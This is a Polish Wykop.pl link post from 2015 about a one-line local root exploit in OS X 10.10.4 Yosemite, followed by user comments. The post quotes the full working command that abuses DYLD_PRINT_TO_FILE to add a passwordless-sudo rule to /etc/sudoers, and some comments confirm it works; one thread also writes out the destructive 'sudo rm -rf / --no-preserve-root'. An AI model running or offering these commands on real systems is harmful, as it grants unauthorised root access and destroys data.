Wykop.pl Wykop.pl
  • Główna
  • Wykopalisko127
  • Hity
  • Mikroblog
  • Zaloguj się
  • Zarejestruj się
Zaloguj się

Popularne tagi

  • #ciekawostki
  • #informacje
  • #technologia
  • #polska
  • #swiat
  • #motoryzacja
  • #podroze
  • #heheszki
  • #sport

Wykop

  • Ranking

    Ranking
  • Osiągnięcia
  • FAQ
  • O nas
  • Kontakt
  • Reklama
  • Regulamin

438

Root na Maku w jednej linijce, OS X 10.10 Yosemite jest bezbronny

Root na Maku w jednej linijce, OS X 10.10 Yosemite jest bezbronny

eśli chcecie uzyskać roota w najnowszej stabilnej wersji OS X 10.10.4 Yosemite, wystarczy uruchomić powłokę systemową i wpisać następującą komendę: echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

garmet
garmet
z
dobreprogramy.pl
dodany: 23.07.2015, 14:05:36
  • #
    technologia
  • #
    komputery
  • #
    bezpieczenstwo
  • #
    hacking
  • #
    apple
  • #
    osx
  • 268
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

Treści powiązane (1)

Osoba która znalazła dziurę
felixd
z sektioneins.de
  • 2

Komentarze (268)

najlepsze

a.....t
a.....t
konto usunięte 23.07.2015, 14:09:57
  • 109
To się nazywa zaklęcie. Harry Potter przy tym wymięka ;)
  • 18
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

jeanpaul
jeanpaul
23.07.2015, 14:56:27
  • 12
To się nazywa zaklęcie. Harry Potter przy tym wymięka ;)


@aksnet: jak dla kogo zaklecie, nie uzywam mak'a, w pracy siedze "przy windows" ale ta komenda to nic innego jak nadpisanie pliku okreslajacego kto i jak moze uzywac komendy sudo (wywolanie programu z poziomu root'a / administratora dla uzytkownikow widnows). Nowy plik zawiera prawa do wykonania wszystkich polecen bez hasla i nastepnei wywolanie konsoli dla root'a. Domyslam sie tylko celem potwierdzenia ze
  • Odpowiedz
jeanpaul
jeanpaul
23.07.2015, 18:33:52
  • 4
to w czym problem? Na czym polega bezbronność OSX? Mój Arch też "bezbronny" bo jako root mam dostęp do /etc/sudoers? Co pominąłem?


@Djuna: problem polega na tym ze ten program do drukowania nie powinien miec ustawionego setuid i byc wlasnoscia root'a. setuid pozwala na szybkie obejscie wszystkich zabezpieczen i tylko wybrane, dobrze sprawdzone programy,. ktore swoja funkcjonalnoscia nie pozwalaja na modyfikcaje wrazliwych elementow systemu moga dostac setuid.

Twoj arch jest bezpieczyn bo
  • Odpowiedz
jaksiepatrzy
jaksiepatrzy
jaksiepatrzy
23.07.2015, 22:53:50
  • 17
Najnowszy exploit na Maka pokazuje, że zespół bezpieczeństwa Apple powinien jednak zająć się czymś prostszym, np. robieniem tapet.


napisał dziennikarz www.dobreprogramy.pl
  • 1
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

OMGiamSMURF
OMGiamSMURF
24.07.2015, 06:03:16
  • -4
@jaksiepatrzy: śmiechłem #bojowkaandroid tak bardzo #biedakicebulaki
  • Odpowiedz
januszkarwasz
januszkarwasz
januszkarwasz
23.07.2015, 18:38:25
  • 16
o gurwa, faktycznie
januszkarwasz - o gurwa, faktycznie

źródło: comment_ZscnPglJDEy9Iq8MbXUvBs9Qop7hbDBJ.jpg

Pobierz
  • 6
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

januszkarwasz
januszkarwasz
januszkarwasz
23.07.2015, 19:07:54
  • 3
@RuntimeException:
widać, "znak zachęty" zmienił się z '$' na '#', co oznacza uprawnienia roota; po drodze nie było promptu o hasło
  • Odpowiedz
l.....e
l.....e
konto usunięte 23.07.2015, 20:05:45
  • 2
@januszkarwasz: u mnie też działa :D
l.....e - @januszkarwasz: u mnie też działa :D

źródło: comment_cfgTx3lxgK7nzmIFZOSgqLD1VqhF1bDC.jpg

Pobierz
  • Odpowiedz
smk666
smk666
23.07.2015, 14:28:29
  • 9
#glupiepytanie
Na nowym macu użytkownik fabrycznie nie może w ogóle korzystać z uprawnień roota czy może chodzi tutaj tylko o potencjalny wektor ataku a su/sudo działa jak bozia przykazała na niegrzebanym OSXie?
  • 40
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

StayAlive
StayAlive
23.07.2015, 15:57:25
  • 165
@smk666: Bezpieczeństwo osx i linuxów (z resztą nie tylko bo unixów też) polega na tym (między innymi), że istnieje ścisła kontrola uprawnień - bez roota nic nie zrobisz. Tutaj atakujący ma otwartą furtkę.

Nawet taki żart był, że po wyciągnięciu wtyczki z sieci maszyna linuxowa powinna zapytać o uprawnienia roota, a jeśli ich brak - kontynuować pracę.
  • Odpowiedz
t.....z
t.....z
konto usunięte 23.07.2015, 16:21:06
  • 58
Bezpieczeństwo osx i linuxów (z resztą nie tylko bo unixów też) polega na tym (między innymi), że istnieje ścisła kontrola uprawnień - bez roota nic nie zrobisz.


@StayAlive: W Windowsie, począwszy od Visty istnieje podobny mechanizm - User Account Control. Jednak znaczna część użytkowników to wyłącza, bo ciągłe potwierdzanie wykonania procedury wymagającej wyższych uprawnień ich irytuje. A potem dziwota, że pecety z Windowsem są zawirusowane.
  • Odpowiedz
iksinski
iksinski
iksinski
23.07.2015, 18:19:29
  • 6
Słyszałem, że 'sudo rm -rf /' też działa.
  • 6
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

virgoerns
virgoerns
23.07.2015, 19:29:20
  • 8
@iksinski: Działa, ale tylko z --no-preserve-root.


  • Odpowiedz
virgoerns
virgoerns
23.07.2015, 19:51:07
  • 8
@PeQ: rozwija się dokładnie do sudo rm -rf / --no-preserve-root
  • Odpowiedz
m.....l
m.....l
konto usunięte 23.07.2015, 18:12:06
  • 4
widzisz curwa @ginden a jak Ci ostatnio o tym pisałem to mnie wyśmiałeś.
Głosuj sobie dalej na PO :/
  • 1
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

list86
list86
23.07.2015, 18:14:32
  • -3
@marianbaczal:
list86 - @marianbaczal:

źródło: comment_s1xmgUriuVEe3QyTAkq79KYODggDTYec.jpg

Pobierz
  • Odpowiedz
teraz_fred_wyrucha_was
teraz_fred_wyrucha_was
teraz_fred_wyrucha_was
23.07.2015, 19:11:11
  • 3
OS X to nie jest prawdziwy Linuks!!!one1elewen
  • 15
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

g.....i
g.....i
konto usunięte 23.07.2015, 19:17:12
  • 5
@teraz_fred_wyrucha_was:
Tak, bo jest prawdziwym Unixem - w przeciwieństwie do Linuxa ( ͡° ͜ʖ ͡°)
  • Odpowiedz
teraz_fred_wyrucha_was
teraz_fred_wyrucha_was
teraz_fred_wyrucha_was
23.07.2015, 19:23:46
  • 7
@gacek_wilkooki: Uniksem prawdziwym też nie jest, bo, niestety, OS X to fork BSD oblepiony wielkimi brzydkimi blobami...
  • Odpowiedz
list86
list86
24.07.2015, 08:35:33
  • 2
ITT: kłótnie fanboyów maca z fanboyami windowsa. I nazywanie komputerów z windowsem "PC" a komputerów z osx "Mac". Śmiechłem nawet.

Tymczasem
list86 - ITT: kłótnie fanboyów maca z fanboyami windowsa. I nazywanie komputerów z wi...

źródło: comment_pK5UumksJPvdrbapgeUjAPgCj6hhWI3H.jpg

Pobierz
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

prusi
prusi
prusi
24.07.2015, 07:18:45
  • 2
Apple się stacza bez Jobsa skoro użytkownicy Maców muszą ściągać łatki na jądro z githuba XD
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

p.....k
p.....k
konto usunięte 23.07.2015, 22:05:37
  • 2
ROK LINUXA!!!
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

  • <
  • 1
  • 2
  • 3
  • 4
  • Strona 1 z 4
  • >

Hity

tygodnia

Najładniejszy MOP w Polsce, doceńmy pracę Pań!
Najładniejszy MOP w Polsce, doceńmy pracę Pań!
3685
I znowu psy: Cztery psy zagryzły 80-latka
I znowu psy: Cztery psy zagryzły 80-latka
3632
Czy coś wiadomo co u byłego sołtysa?
Czy coś wiadomo co u byłego sołtysa?
3304
Słynne Prince Polo XXL zmniejszyło gramaturę
Słynne Prince Polo XXL zmniejszyło gramaturę
2694
Facet opracował kamerę rejestrującą 2 miliardy FPS i nagrał ruch wiązki lasera
Facet opracował kamerę rejestrującą 2 miliardy FPS i nagrał ruch wiązki lasera
2388
Pokaż więcej

Powiązane tagi

  • #ciekawostki
  • #nauka
  • #komputery
  • #zainteresowania
  • #stacjakosmiczna
  • #wydarzenia
  • #polska
  • #informatyka
  • #internet
  • #swiat
  • #rozrywka
  • #sztucznainteligencja
  • #motoryzacja
  • #ai
  • #telefony

Wykop © 2005-2025

  • O nas
  • Reklama
  • FAQ
  • Kontakt
  • Regulamin
  • Polityka prywatności i cookies
  • Hity
  • Ranking
  • Osiągnięcia
  • Changelog
  • więcej

RSS

  • Wykopane
  • Wykopalisko
  • Komentowane
  • Ustawienia prywatności

Regulamin

Reklama

Kontakt

O nas

FAQ

Osiągnięcia